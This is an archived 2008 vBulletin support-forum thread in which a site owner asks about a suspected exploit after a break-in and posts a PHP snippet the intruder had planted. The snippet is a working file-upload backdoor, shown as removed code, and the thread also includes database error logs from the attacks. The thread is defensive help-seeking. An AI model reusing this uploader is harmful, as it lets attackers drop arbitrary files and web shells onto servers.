vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=15)
-   -   Potential Exploit in VB 3.7.1? (https://vborg.vbsupport.ru/showthread.php?t=180821)

pspcrazy 05-28-2008 07:34 PM
Potential Exploit in VB 3.7.1?
 
Hi as of late they have been a hacker that's been messing with my site. I removed some code which he placed into my code the last time he hacked:

PHP Code:
<?php $ficnt = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), $_FILES["s"]["size"]); 
if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $ficnt)) echo $_FILES["s"]["name"]; ?>
Don't know what it does but i know it's not supposed to be there.

Oddly though now he's doing something else and i'm getting a lot of sql errors like:

Database error in vBulletin 3.7.1:

Code:
Invalid SQL:

                      SELECT COUNT(*) AS count
                      FROM vbattachment
                      WHERE posthash = 'invalid posthash'
                              AND userid = 0;

MySQL Error  : Lost connection to MySQL server during query
Error Number  : 2013
Request Date  : Wednesday, May 28th 2008 @ 03:14:25 PM
Error Date    : Wednesday, May 28th 2008 @ 03:15:04 PM
Script        : http://www.animecrazy.net/forums/newreply.php?do=postreply&t=1607
Referrer      : http://www.animecrazy.net/forums/newreply.php?do=newreply&noquote=1&p=3625
IP Address    : 24.47.55.108
Username      : crack
Classname    : vB_Database
which only occur when he tries to hack me and the username crack remains the same but the ip changes mabye 10 different times per minute very odd.

Anyone have any ideas as to what he's doing?

Mark.B 05-28-2008 07:54 PM
Sounds like he hacked the server rather than vB.

pspcrazy 05-28-2008 08:32 PM
The first time he apparently knew an admin's password but we replaced all the passwords and removed all the anomalies, so I doubt it's a server problem at this point. But hey I might be wrong.

Princeton 05-29-2008 12:20 PM
I suggest checking for files that do not belong and check your files for any further edits.

Your best bet is to hire someone that can look into this.

pspcrazy 05-29-2008 03:13 PM
Got any ideas on who? Have any experience with seeksadmin.com ?


All times are GMT. The time now is 11:13 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01103 seconds
  • Memory Usage 1,721KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_php_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (5)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete